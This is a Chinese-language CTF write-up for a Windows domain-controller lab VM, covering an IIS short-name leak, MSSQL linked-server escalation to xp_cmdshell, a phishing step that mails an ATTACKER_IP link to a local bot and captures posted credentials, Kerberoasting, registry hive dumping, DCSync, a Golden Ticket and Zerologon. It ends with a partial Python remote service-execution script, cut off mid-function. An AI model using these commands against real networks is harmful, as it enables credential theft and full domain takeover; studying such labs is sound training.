[域控接管] secretsdump 提取 krbtgt hash → Golden Ticket
      ↓
[最终目标] 域管理员权限 → 读取 Flag

Castlevania - Write Up

Bloodstained Ova

VirtualBox Version

靶机信息

IP: 192.168.0.xxx（根据桥接网卡不同而改变）

域名: XMCVE.local

主机名: CASTLEVANIA

操作系统: Windows Server 2019 (域控制器)

难度: 适中

Flag 位置: C:\Users\Administrator\Desktop\flag.txt

第一步：信息收集

1.1 端口扫描

nmap -sT -sV -sC -p- --min-rate 5000 192.168.0.222 -oA scans/castlevania

关键端口：

端口	服务	版本/说明
53	DNS	Simple DNS Plus
80	HTTP	Microsoft IIS httpd 10.0
88	Kerberos	域控认证服务
135	MSRPC	Windows RPC
139	NetBIOS	NetBIOS Session
389	LDAP	AD LDAP (XMCVE.local)
445	SMB	SMBv3 (signing required)
1433	MSSQL	SQL Server 2016 SP2
3268	LDAP GC	Global Catalog

注意： SMTP 端口 25 仅在靶机本地监听（127.0.0.1:25），外部 nmap 扫描不可见。需要通过 xp_cmdshell 在靶机内部发现。

分析： 目标同时运行 Web 服务、数据库和域控制器，属于单机 DC + 业务服务合一的架构。端口 88 和 389 表明这是一台域控制器，nmap 的 ms-sql-ntlm-info 脚本泄露域名 XMCVE.local 和主机名 CASTLEVANIA。

第二步：IIS 8.3 短文件名泄露

2.1 常规目录枚举

gobuster dir -u http://192.168.0.222/ -w /usr/share/wordlists/dirb/common.txt -t 50

常规枚举无明显发现，页面仅显示 "Employee Portal - Under maintenance..."。

2.2 检测 8.3 短文件名漏洞

IIS 在 Windows 上默认启用 8.3 短文件名（NTFS 兼容特性）。可以利用 HTTP 响应差异来枚举短文件名。

# 使用 shortscan 工具
shortscan http://192.168.0.222/

发现：

[+] File: /POO_CO~1.TXT (Status: 200)

原理： Windows NTFS 会为长文件名自动生成 8.3 格式的短文件名。IIS 对存在和不存在的短文件名返回不同的 HTTP 状态码，攻击者可以逐字符枚举出短文件名。

2.3 定向 Fuzz 还原完整文件名

已知短文件名前缀为 poo_co，需要 fuzz 出完整文件名：

# 从字典中提取以 "co" 开头的单词
grep -i "^co" /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt > co_fuzz.txt

# 定向 fuzz
wfuzz -c -w co_fuzz.txt -u "http://192.168.0.222/poo_FUZZ.txt" --hc 404

命中：

000000XXX:   200   C=XXL   "connection"

完整文件名为 poo_connection.txt。

2.4 读取凭据文件

curl -s http://192.168.0.222/poo_connection.txt

输出：

server=localhost;
user=wuwupor;
password=lovlyBaby
database=master

收获： 获得 MSSQL 数据库凭据 wuwupor:lovlyBaby。

第三步：MSSQL Linked Server 提权

3.1 连接数据库

impacket-mssqlclient wuwupor:lovlyBaby@192.168.0.222

成功登录。

3.2 检查当前权限

SELECT SYSTEM_USER;
-- 输出: wuwupor

SELECT IS_SRVROLEMEMBER('sysadmin');
-- 输出: 0 (非 sysadmin，权限很低)

3.3 枚举 Linked Server

SELECT srvname FROM sysservers;

输出：

CASTLEVANIA
POO_CONFIG
POO_PUBLIC

发现名为 POO_CONFIG和POO_PUBLIC 的 Linked Server。

3.4 通过 Linked Server 提权

-- 检查通过 Linked Server 执行时的身份
EXEC ('EXEC (''SELECT SUSER_NAME();'') AT [POO_PUBLIC]') AT [POO_CONFIG];

输出：

sa

关键发现！ Linked Server POO_CONFIG 配置错误，将所有登录映射到 sa 账户。这意味着低权限的 wuwupor 可以通过 Linked Server 以 sa 身份执行任意 SQL 命令。

3.5 通过 xp_cmdshell 获取命令执行

-- 通过 Linked Server 以 sa 身份执行系统命令
EXEC ('EXEC (''xp_cmdshell ''''whoami'''' '') AT [POO_PUBLIC]') AT [POO_CONFIG];

输出：

xmcve\sqlsvc

成功获得操作系统命令执行权限，当前身份为域用户 xmcve\sqlsvc。

第四步：SMTP 钓鱼攻击 - 获取域用户凭据

4.1 发现 SMTP 服务

EXEC ('EXEC (''xp_cmdshell ''''netstat -ano ^| findstr LISTENING'''' '') AT [POO_PUBLIC]') AT [POO_CONFIG];

发现 25 端口（SMTP）正在监听。

4.2 在 Kali 上启动监听器

# 方法一：简单 nc（每次只捕获一个 POST，需重复）
nc -lnvp 80

# 方法二：Python 持久监听（推荐，可捕获所有 POST）
python3 -c "
from http.server import HTTPServer, BaseHTTPRequestHandler
class H(BaseHTTPRequestHandler):
    def do_POST(self):
        body = self.rfile.read(int(self.headers.get('Content-Length',0))).decode()
        print(f'[+] {body}')
        self.send_response(200); self.end_headers(); self.wfile.write(b'OK')
    def log_message(self,*a): pass
HTTPServer(('0.0.0.0',80),H).serve_forever()
"

4.3 SMTP-钓鱼邮件

注意： 考点在于swaks邮件欺骗，SMTP 端口 25 仅在靶机本地监听，外部无法直接访问。攻击者可以通过代理转发进行swaks欺骗，也可以通过已获得的 xp_cmdshell 在靶机本地发送邮件

-- 通过 Linked Server 以 sa 身份，利用 xp_cmdshell 调用 PowerShell 发送邮件
EXEC ('EXEC (''xp_cmdshell ''''powershell -Command "Send-MailMessage -To xxxxxx@XMCVE.local -From xxxxxx@XMCVE.local -Subject test -Body http://ATTACKER_IP/ -SmtpServer 127.0.0.1"'''' '') AT [POO_PUBLIC]') AT [POO_CONFIG];

http://ATTACKER_IP/ 这里替换为监听端口的ip地址

swaks ----from xxxxxx@XMCVE.local --body "citrix http://ATTACKER_IP/" --server $_IP

推荐使用kali工具swaks进行欺骗枚举

替换说明：

ATTACKER_IP: 你的 Kali IP（如 192.168.0.108）

邮件正文只需包含 URL，Bot 会自动提取并访问

4.4 捕获凭据

靶机上有邮件处理机器人，会模拟用户点击邮件中的链接并提交登录凭据。在 nc 监听器上会陆续收到多个 POST 请求：

connect to [ATTACKER_IP] from (UNKNOWN) [TARGET_IP] XXXXX
POST /remote/auth/login.aspx HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) ...
Host: ATTACKER_IP

LoginType=Explicit&user=pr3d1ct&password=yuyan_crypto&domain=XMCVE.LOCAL

注意： 每次只能捕获一个 POST（nc 收到后会断开）。需要重复发送钓鱼邮件并重启 nc 监听，共捕获 4 组凭据：

用户名	密码	说明
pr3d1ct	yuyan_crypto	噪声账户（非域用户）
p2zhh	p2zhh_web	有效域用户 ← 关键
aomr	aomr_reverse	噪声账户（非域用户）
berial	berial_pwn	噪声账户（非域用户）

原理： 这是一个经典的钓鱼攻击场景。攻击者发送包含恶意 URL 的邮件，目标用户点击链接后会被重定向到攻击者控制的假登录页面，输入的凭据被攻击者捕获。

将所有用户名保存到 users.txt，密码保存到 passwd.txt，用于下一步验证。

收获： 获得多组用户名密码，其中 p2zhh:p2zhh_web 是关键。

第五步：域用户验证

5.1 Kerbrute 用户枚举

将邮件中的用户名保存到 users.txt：

pr3d1ct
aomr
p2zhh
berial

kerbrute userenum -d XMCVE.local users.txt --dc 192.168.0.222

确认 p2zhh 为有效域用户。

5.2 CrackMapExec 验证凭据

crackmapexec smb 192.168.0.222 -u p2zhh -p p2zhh_web

输出：

SMB  192.168.0.222  445  CASTLEVANIA  [+] XMCVE.local\p2zhh:p2zhh_web

凭据有效，p2zhh 是一个合法的域用户。

第六步：Kerberoasting / AS-REP Roasting

6.1 Kerberoasting（路径 A）

利用 p2zhh 的域用户身份查询设置了 SPN 的账户：

impacket-GetUserSPNs XMCVE.local/p2zhh:p2zhh_web -dc-ip 192.168.0.222 -request

输出：

ServicePrincipalName                    Name    MemberOf
--------------------------------------  ------  --------------------------------
HTTP/CASTLEVANIA.XMCVE.local            mowen   CN=Backup Operators,CN=Builtin,...

$krb5tgs$23$*mowen$XMCVE.LOCAL$HTTP/CASTLEVANIA.XMCVE.local*$...

关键发现：

用户 mowen 设置了 SPN，可以进行 Kerberoasting
mowen 是 Backup Operators 组成员（这在后续步骤中非常重要）

6.2 AS-REP Roasting（路径 B）

impacket-GetNPUsers XMCVE.local/ -dc-ip 192.168.0.222 -usersfile users.txt -no-pass

输出：

$krb5asrep$23$mowen@XMCVE.LOCAL:...

mowen 账户设置了 "不需要 Kerberos 预认证"（DoesNotRequirePreAuth），可以直接获取 AS-REP hash。

6.3 离线破解

# Kerberoasting hash (TGS-REP, mode 13100)
hashcat -m 13100 tgs_hash.txt /usr/share/wordlists/rockyou.txt

# 或 AS-REP hash (mode 18200)
hashcat -m 18200 asrep_hash.txt /usr/share/wordlists/rockyou.txt

破解结果：

mowen:1maxwell

第七步：域枚举 - 确认 Backup Operators

7.1 LDAP 信息收集

ldapdomaindump -u 'XMCVE.local\mowen' -p '1maxwell' 192.168.0.222

查看生成的 HTML/JSON 文件，确认 mowen 的组成员关系：

MemberOf: CN=Backup Operators,CN=Builtin,DC=XMCVE,DC=local

分析： Backup Operators 组成员拥有备份系统文件的特权，包括读取注册表 Hive（SAM、SYSTEM、SECURITY），这些 Hive 中包含域内所有账户的哈希值。

第八步：Backup Operators 权限利用

方法一

8.1 启动攻击机 SMB 共享

在 Kali 上启动一个 SMB 共享，用于接收导出的注册表文件：

mkdir /tmp/share
impacket-smbserver -smb2support share /tmp/share

8.2 远程注册表备份

利用 mowen 的 Backup Operators 权限，远程导出注册表 Hive：

# 方法一：直接导出到攻击机 SMB 共享（需要靶机出站 445 可达）
impacket-reg XMCVE.local/mowen:1maxwell@192.168.0.222 backup -o \\<ATTACKER_IP>\share

# 方法二：导出到靶机本地路径（推荐，避免出站 SMB 被防火墙拦截）
impacket-reg XMCVE.local/mowen:1maxwell@192.168.0.222 backup -o 'C:\Windows\Temp\hives'

注意： 如果方法一报 ERROR_PATH_NOT_FOUND，说明靶机无法访问攻击机的 SMB 共享（出站 445 被阻断）。使用方法二将 Hive 保存到靶机本地，再通过 smbclient 下载：

如果 C$ 也无权限，可通过其他已有的命令执行通道（如 xp_cmdshell）将文件拷贝到可访问的位置。

smbclient '//192.168.0.222/C$' -U 'XMCVE/mowen%1maxwell' -c 'mkdir Windows\Temp\hives'

smbclient '//192.168.0.222/C$' -U 'XMCVE/mowen%1maxwell' -c 'cd Windows\Temp\hives; get SAM.save; get SYSTEM.save; get SECURITY.save'

生成文件：

SAM.save      (24 KB)
SYSTEM.save   (15 MB)
SECURITY.save (40 KB)

原理： Backup Operators 组成员拥有 SeBackupPrivilege，允许读取系统上任何文件，包括受保护的注册表 Hive。impacket-reg 通过远程注册表服务（RemoteRegistry）执行 RegSaveKey 操作，将 Hive 导出到指定路径。

方法二

IIS存储

impacket-reg XMCVE.local/mowen:1maxwell@192.168.0.222 backup -o 'C:\inetpub\wwwroot'

浏览器访问（iis默认配置不可以访问save文件，管理员已对iis配置文件进行了修改）

第九步：提取 krbtgt Hash

离线解析 Hive

impacket-secretsdump -system /tmp/share/SYSTEM.save -security /tmp/share/SECURITY.save -sam /tmp/share/SAM.save LOCAL

输出（关键部分）：

[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:85ef092d9016422943e90d8a9dd7be0d

[*] DefaultPassword
(Unknown User):jU@Li&us@!#!

[*] _SC_MSSQLSERVER
(Unknown User):Sql!2026

关键发现： $MACHINE.ACC 是域控的机器账户（CASTLEVANIA$）NTLM hash。在域控上，机器账户拥有 DCSync 权限，可以用它提取 krbtgt hash。

第十步：黄金票据伪造

利用机器账户 DCSync 提取 krbtgt

impacket-secretsdump -hashes 'aad3b435b51404eeaad3b435b51404ee:85ef092d9016422943e90d8a9dd7be0d' \
    'XMCVE.local/CASTLEVANIA$@CASTLEVANIA.XMCVE.local' \
    -just-dc-user krbtgt -target-ip 192.168.0.222

输出：

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1e3c4fe72e1383c576b4b3aeef4730a8:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:2392ad160e585e1448c5ca4623b9ad48789c267c6488a0074dd86e98457fb5fc
krbtgt:aes128-cts-hmac-sha1-96:7d55d129c8fe6c50aa87cb542775f0a0
krbtgt:des-cbc-md5:e570376eb538c132

收获： 成功提取 krbtgt 账户的 NTLM hash 1e3c4fe72e1383c576b4b3aeef4730a8。这是域中最关键的密钥，拥有它就可以伪造任意 Kerberos 票据。

获取域 SID

impacket-lookupsid XMCVE.local/mowen:1maxwell@192.168.0.222

输出：

[*] Domain SID is: S-1-5-21-805392858-1149987238-1076533053

伪造 Golden Ticket

impacket-ticketer \
    -nthash 1e3c4fe72e1383c576b4b3aeef4730a8 \
    -domain-sid S-1-5-21-805392858-1149987238-1076533053 \
    -domain XMCVE.local \
    Administrator

输出：

[*] Creating basic skeleton ticket and target PAC
[*] Customizing ticket for XMCVE.local/Administrator
[*] PAC_LOGON_INFO
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache

注入票据

export KRB5CCNAME=Administrator.ccache

确认票据已加载：

klist

输出：

Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@XMCVE.LOCAL

Valid starting       Expires              Service principal
XX/XX/XXXX XX:XX:XX  XX/XX/XXXX XX:XX:XX  krbtgt/XMCVE.LOCAL@XMCVE.LOCAL

配置 Kerberos 认证

确保 /etc/krb5.conf 包含正确的域配置：

[libdefaults]
    default_realm = XMCVE.LOCAL
    dns_lookup_realm = false
    dns_lookup_kdc = false

[realms]
    XMCVE.LOCAL = {
        kdc = 192.168.0.222
        admin_server = 192.168.0.222
    }

[domain_realm]
    .xmcve.local = XMCVE.LOCAL
    xmcve.local = XMCVE.LOCAL

同时确保 /etc/hosts 中有正确的解析：

192.168.0.222    CASTLEVANIA.XMCVE.local CASTLEVANIA

使用 Golden Ticket 获取域管 Shell

# 方法一：psexec（获取交互式 SYSTEM shell）
impacket-psexec XMCVE.local/Administrator@CASTLEVANIA.XMCVE.local -k -no-pass -target-ip 192.168.0.222

# 方法二：wmiexec（直接执行命令，更隐蔽）
impacket-wmiexec XMCVE.local/Administrator@CASTLEVANIA.XMCVE.local -k -no-pass -target-ip 192.168.0.222 -codec gbk "type C:\Users\Administrator\Desktop\flag.txt"

wmiexec 输出：

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] SMBv3.0 dialect used
FLAG{XMCVE_Castlevania_Bloodlines_DA_Pwned}

成功以域管理员身份执行命令。

获取 Flag（已删除）

type C:\Users\Administrator\Desktop\flag.txt

输出：

FLAG{XMCVE_Castlevania_Bloodlines_DA_Pwned}

Castlevania - Unexpected

第一次出靶机题，经验有限不尽人意之处请多海涵，观看选手wp也学到了很多

下列四种非预期解法均取自本次比赛选手的wp中

Zerologon

CVSS满分漏洞，被称为域内永恒之蓝

靶机搭建环境选自互联网中windows server2019镜像.....出题的时候没往这块想

出乎我的意料了......当看到选手的wp令我很惊讶

八名选手采用该方法解出题目

影响系统版本

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

利用方法

手法一：msfconsole

1. ZeroLogon

$ crackmapexec smb 192.168.40.132 -u '' -p '' -M zerologon

ZEROLOGO...  192.168.40.132  445  CASTLEVANIA  VULNERABLE

msf6> use auxiliary/admin/dcerpc/cve_2020_1472_zerologon
msf6> set RHOSTS 192.168.40.132
msf6> set NBNAME CASTLEVANIA
msf6> run

[+] 192.168.40.132:49668 - Successfully authenticated
[+] 192.168.40.132:49668 - Successfully set the machine account (CASTLEVANIA$) password to:
    aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)

2. DCSync

$ impacket-secretsdump -hashes ':31d6cfe0d16ae931b73c59d7e0c089c0' \
   -just-dc 'XMCVE.local/CASTLEVANIA$'@192.168.40.132

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)

Administrator:500:aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1e3c4fe72e1383c576b4b3aeef4730a8:::
Alucard:1000:aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168:::
XMCVE.local\p2zhh:1104:aad3b435b51404eeaad3b435b51404ee:bc2bf43119e258bcecf71d44abc29db7:::
XMCVE.local\mowen:1105:aad3b435b51404eeaad3b435b51404ee:efb5fa49a38497a71e144f690860688e:::

手法二：python脚本

1. Zerologon

2. hash dump

利用成功，接下来dump域内所有用户的哈希

本地挂载

当初为了预防选手将靶机当取证来做故将flag抹去，当看到wp令我意外.....

并且还没办法修，无论是ntds.dit还是Hive删掉都会直接影响系统运行

俩名选手采用该方法解出题目

方法一：挂载kali

1. 挂载硬盘并提取 NTDS 数据库

将 Windows 域控的虚拟硬盘挂载到 Kali Linux，复制 AD 数据库文件：

ntds.dit：Active Directory 数据库，存储所有域用户的凭据 Hash

SYSTEM：注册表 Hive，包含解密 ntds.dit 所需的 BootKey

sudo cp /mnt/win/Windows/NTDS/ntds.dit ~/Desktop/
sudo cp /mnt/win/Windows/System32/config/SYSTEM ~/Desktop/

2. 离线提取域用户 Hash

使用 impacket-secretsdump 离线解密 ntds.dit：

关键发现：Administrator 与 Alucard 共享同一个 NT Hash，多个普通用户也共享同一个 Hash，说明存在弱密码策略。

sudo impacket-secretsdump -ntds ~/Desktop/ntds.dit -system ~/Desktop/SYSTEM LOCAL

成功提取所有域用户的 NT Hash： Administrator:500:aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168::: Alucard:1000:aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168::: XMCVE.local\p2zhh:1104:::bc2bf43119e258bcecf71d44abc29db7::: XMCVE.local\mowen:1105:::efb5fa49a38497a71e144f690860688e::: XMCVE.local\sales/support/it/hr/admin:共享 hash 2b576acbe6bcfda7294d6bd18041b8fe XMCVE.local\sqlsvc:1112:::d93ef04edb808c5bce3a5bd67b936ca9:::

方法二：OVA分解挂盘

1. VBoxManage

本地没有直接可用的官方 VirtualBox 7.2.0 图形界面环境，所以我直接用 VBoxManage.exe 做手工导入和挂盘。

处理方式不是直接 VBoxManage import，而是：

从 Bloodstained.ova 解出 Bloodstained.ovf 和 Bloodstained 1-disk001.vmdk
把 streamOptimized 的 VMDK 转成可直接挂载的 VDI
手工创建 Windows2019_64 虚拟机并挂盘
配置 NAT 端口转发

2. 离线导出

离线链路，从 VMDK 里直接导出关键文件：

/Windows/NTDS/ntds.dit
/Windows/System32/config/SYSTEM
/Windows/System32/config/SECURITY
/inetpub/wwwroot

3. 域控凭据

对离线导出的三件套执行：

python secretsdump.py -system offline/hives/SYSTEM \
  -security offline/hives/SECURITY \
  -ntds offline/hives/ntds.dit LOCAL

利用脚本

import argparse
import os
import random
import re
import shutil
import string
import subprocess
import sys
import time
from pathlib import Path

from impacket.dcerpc.v5 import scmr, transport


ROOT = Path(__file__).resolve().parent
VM_NAME = "Bloodstained"
DEFAULT_OVA = ROOT / "Bloodstained.ova"
DEFAULT_OVF = ROOT / "Bloodstained.ovf"
DEFAULT_VMDK = ROOT / "Bloodstained 1-disk001.vmdk"
DEFAULT_VM_DIR = ROOT / "vm" / VM_NAME
DEFAULT_VDI = DEFAULT_VM_DIR / f"{VM_NAME}.vdi"
DEFAULT_VBOX_HOME = ROOT / ".vboxhome"
DEFAULT_OFFLINE_DIR = ROOT / "offline" / "hives"
DEFAULT_DUMP = ROOT / "artifacts_secretsdump.txt"
DEFAULT_WHOAMI = ROOT / "artifacts_system_whoami.txt"
DEFAULT_HOSTNAME = ROOT / "artifacts_system_hostname.txt"


def run_command(args, *, cwd=None, env=None, check=True, capture=True):
    proc = subprocess.run(
        args,
        cwd=cwd,
        env=env,
        check=False,
        capture_output=capture,
        text=True,
        encoding="utf-8",
        errors="backslashreplace",
    )
    if check and proc.returncode != 0:
        details = proc.stdout
        if proc.stderr:
            details = f"{details}\n{proc.stderr}" if details else proc.stderr
        raise RuntimeError(f"command failed ({proc.returncode}): {' '.join(map(str, args))}\n{details}".rstrip())
    return proc


def ensure_exists(path: Path, hint: str) -> None:
    if not path.exists():
        raise RuntimeError(f"missing required file: {path}\n{hint}")


def find_vboxmanage() -> Path:
    candidates = [
        Path(r"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe"),
        Path(r"C:\Program Files\ldplayer9box\VBoxManage.exe"),
    ]
    for candidate in candidates:
        if candidate.exists():
            return candidate
    found = shutil.which("VBoxManage.exe") or shutil.which("VBoxManage")
    if found:
        return Path(found)
    raise RuntimeError("VBoxManage.exe not found. Install VirtualBox 7.2.0 or adjust PATH.")


def find_wsl() -> Path:
    found = shutil.which("wsl.exe")
    if not found:
        raise RuntimeError("wsl.exe not found. WSL with kali-linux is required for virt-copy-out.")
    return Path(found)


def find_secretsdump(default_python: Path) -> Path:
    candidates = [
        default_python.parent / "Scripts" / "secretsdump.py",
        Path(r"D:\Python\Python311\Scripts\secretsdump.py"),
    ]
    for candidate in candidates:
        if candidate.exists():
            return candidate
    raise RuntimeError("secretsdump.py not found. Install impacket for the Python interpreter you will use.")


def vbox(vboxmanage: Path, vbox_home: Path, *args: str) -> subprocess.CompletedProcess:
    env = os.environ.copy()
    env["VBOX_USER_HOME"] = str(vbox_home)
    return run_command([str(vboxmanage), *args], env=env)


def convert_to_wsl_path(path: Path) -> str:
    full = path.resolve()
    drive = full.drive[:1].lower()
    rest = full.as_posix()[2:]
    return f"/mnt/{drive}{rest}"


def ensure_ova_extracted(ova: Path, ovf: Path, vmdk: Path) -> None:
    ensure_exists(ova, "Place the challenge OVA in the current directory.")
    if ovf.exists() and vmdk.exists():
        return
    run_command(["tar", "-xf", str(ova), ovf.name, vmdk.name], cwd=ova.parent)


def ensure_vdi(vboxmanage: Path, vmdk: Path, vdi: Path) -> None:
    if vdi.exists():
        return
    vdi.parent.mkdir(parents=True, exist_ok=True)
    run_command([str(vboxmanage), "clonemedium", "disk", str(vmdk), str(vdi), "--format", "VDI"])


def ensure_vm_registered(vboxmanage: Path, vbox_home: Path, vm_dir: Path, vdi: Path) -> None:
    vm_dir.mkdir(parents=True, exist_ok=True)
    vbox_home.mkdir(parents=True, exist_ok=True)
    vbox(vboxmanage, vbox_home, "list", "systemproperties")
    vm_list = vbox(vboxmanage, vbox_home, "list", "vms").stdout
    vmx = vm_dir / f"{VM_NAME}.vbox"
    if f'"{VM_NAME}"' not in vm_list:
        if vmx.exists():
            vbox(vboxmanage, vbox_home, "registervm", str(vmx))
        else:
            vbox(vboxmanage, vbox_home, "createvm", "--name", VM_NAME, "--basefolder", str(ROOT / "vm"), "--ostype", "Windows2019_64", "--register")
            vbox(
                vboxmanage,
                vbox_home,
                "modifyvm",
                VM_NAME,
                "--memory",
                "2048",
                "--cpus",
                "1",
                "--firmware",
                "bios",
                "--ioapic",
                "on",
                "--pae",
                "off",
                "--vram",
                "128",
                "--graphicscontroller",
                "vboxsvga",
                "--boot1",
                "disk",
                "--boot2",
                "dvd",
                "--boot3",
                "none",
                "--boot4",
                "none",
                "--audio",
                "none",
            )
            vbox(vboxmanage, vbox_home, "storagectl", VM_NAME, "--name", "SATA", "--add", "sata", "--controller", "IntelAhci")

    info = vbox(vboxmanage, vbox_home, "showvminfo", VM_NAME, "--machinereadable").stdout
    if '"SATA-0-0"="none"' in info:
        vbox(
            vboxmanage,
            vbox_home,
            "storageattach",
            VM_NAME,
            "--storagectl",
            "SATA",
            "--port",
            "0",
            "--device",
            "0",
            "--type",
            "hdd",
            "--medium",
            str(vdi),
        )


def ensure_nat_rules(vboxmanage: Path, vbox_home: Path) -> None:
    forwards = [
        "http,tcp,127.0.0.1,18080,,80",
        "ldap,tcp,127.0.0.1,10389,,389",
        "mssql,tcp,127.0.0.1,11433,,1433",
        "smb,tcp,127.0.0.1,10445,,445",
    ]
    info = vbox(vboxmanage, vbox_home, "showvminfo", VM_NAME, "--machinereadable").stdout
    for rule in forwards:
        name = rule.split(",", 1)[0]
        pattern = re.compile(rf'^Forwarding\(\d+\)="{re.escape(name)},', re.MULTILINE)
        if not pattern.search(info):
            vbox(vboxmanage, vbox_home, "modifyvm", VM_NAME, "--natpf1", rule)


def get_vm_state(vboxmanage: Path, vbox_home: Path) -> str:
    info = vbox(vboxmanage, vbox_home, "showvminfo", VM_NAME, "--machinereadable").stdout
    match = re.search(r'^VMState="([^"]+)"$', info, re.MULTILINE)
    return match.group(1) if match else "unknown"


def restart_vm(vboxmanage: Path, vbox_home: Path, boot_wait: int) -> None:
    state = get_vm_state(vboxmanage, vbox_home)
    if state == "running":
        vbox(vboxmanage, vbox_home, "controlvm", VM_NAME, "poweroff")
        time.sleep(3)
    vbox(vboxmanage, vbox_home, "startvm", VM_NAME, "--type", "headless")
    time.sleep(boot_wait)


def copy_offline_hives(wsl_exe: Path, work_root: Path, offline_dir: Path, distro: str, vmdk: Path) -> None:
    offline_dir.mkdir(parents=True, exist_ok=True)
    wsl_root = convert_to_wsl_path(work_root)
    wsl_vmdk = convert_to_wsl_path(vmdk)
    script = "\n".join(
        [
            "set -e",
            f"cd '{wsl_root}'",
            "mkdir -p offline/hives",
            f"virt-copy-out -a '{wsl_vmdk}' /Windows/NTDS/ntds.dit offline/hives/",
            f"virt-copy-out -a '{wsl_vmdk}' /Windows/System32/config/SYSTEM offline/hives/",
            f"virt-copy-out -a '{wsl_vmdk}' /Windows/System32/config/SECURITY offline/hives/",
        ]
    )
    run_command([str(wsl_exe), "-u", "root", "-d", distro, "--", "bash", "-lc", script])


def run_secretsdump(python_exe: Path, secretsdump: Path, offline_dir: Path, dump_path: Path) -> None:
    system_hive = offline_dir / "SYSTEM"
    security_hive = offline_dir / "SECURITY"
    ntds = offline_dir / "ntds.dit"
    ensure_exists(system_hive, "Offline SYSTEM hive is required.")
    ensure_exists(security_hive, "Offline SECURITY hive is required.")
    ensure_exists(ntds, "Offline NTDS.dit is required.")
    proc = run_command(
        [
            str(python_exe),
            str(secretsdump),
            "-system",
            str(system_hive),
            "-security",
            str(security_hive),
            "-ntds",
            str(ntds),
            "LOCAL",
        ]
    )
    dump_path.write_text(proc.stdout, encoding="utf-8")


def read_text_auto(path: Path) -> str:
    raw = path.read_bytes()
    for encoding in ("utf-8", "utf-16", "utf-16-le", "utf-16-be", "gbk"):
        try:
            return raw.decode(encoding)
        except UnicodeDecodeError:
            continue
    return raw.decode("utf-8", errors="ignore")


def extract_hash_line(dump_path: Path, account: str) -> str:
    pattern = re.compile(rf"{re.escape(account)}:\d+:[0-9a-fA-F]{{32}}:[0-9a-fA-F]{{32}}:::")
    for line in read_text_auto(dump_path).splitlines():
        match = pattern.search(line)
        if match:
            return match.group(0)
    raise RuntimeError(f"could not find hash line for {account} in {dump_path}")


def parse_hash_line(hash_line: str) -> tuple[str, str]:
    parts = hash_line.strip().split(":")
    if len(parts) < 4:
        raise RuntimeError(f"invalid hash line: {hash_line}")
    return parts[2], parts[3]


def random_tag(prefix: str, length: int = 8) -> str:
    return prefix + "".join(random.choice(string.ascii_letters) for _ in range(length))


def escape_for_cmd_echo(command: str) -> str:
    replacements = {
        "^": "^^",
        "&": "^&",
        "<": "^<",
        ">": "^>",
        "|": "^|",
    }
    escaped = []
    for char in command:
        escaped.append(replacements.get(char, char))
    return "".join(escaped)


def smbexec_one_shot(
    *,
    target_name: str,
    target_ip: str,
    smb_port: int,
    domain: str,
    username: str,
    password: str,
    lmhash: str,
    nthash: str,
    command: str,
) -> str:
    stringbinding = rf"ncacn_np:{target_name}[\pipe\svcctl]"
    rpc_transport = transport.DCERPCTransportFactory(stringbinding)
    rpc_transport.setRemoteHost(target_ip)
    rpc_transport.set_dport(smb_port)
    rpc_transport.set_credentials(username, password, domain, lmhash, nthash, None)

    dce = rpc_transport.get_dce_rpc()
    dce.connect()
    dce.bind(scmr.MSRPC_UUID_SCMR)

    smb_conn = rpc_transport.get_smb_connection()
    smb_conn.setTimeout(100000)

    scm_handle = scmr.hROpenSCManagerW(dce)["lpScHandle"]
    service_name = random_tag("svc")
    output_name = random_tag("out") + ".txt"
    batch_name = random_tag("job") + ".bat"
    output_path = rf"C:\Windows\Temp\{output_name}"
    batch_path = rf"C:\Windows\Temp\{batch_name}"
    batch_body = f"{escape_for_cmd_echo(command)} ^> {output_path} 2^>^&1"
    binary_path = (
        rf"C:\Windows\System32\cmd.exe /Q /c "
        rf"echo {batch_body} > {batch_path} & "
        rf"C:\Windows\System32\cmd.exe /Q /c {batch_path} & "
        rf"del {batch_path}"
    )

    service_handle = None
    try:
        resp = scmr.hRCreateServiceW(
            dce,
            scm_handle,
            service_name,
            service_name,
            lpBinaryPathName=binary_path,
            dwStartType=scmr.SERVICE_DEMAND_START,
        )
        service_handle = resp["lpServiceHandle"]
        try:
            scmr.hRStartServiceW(dce, service_handle)
        except Exception:
            pass

        time.sleep(1)

        last_error = None
        for _ in range(30):
            try:
                chunks = []

                def callback(data: bytes) -> None:
                    chunks.append(data)

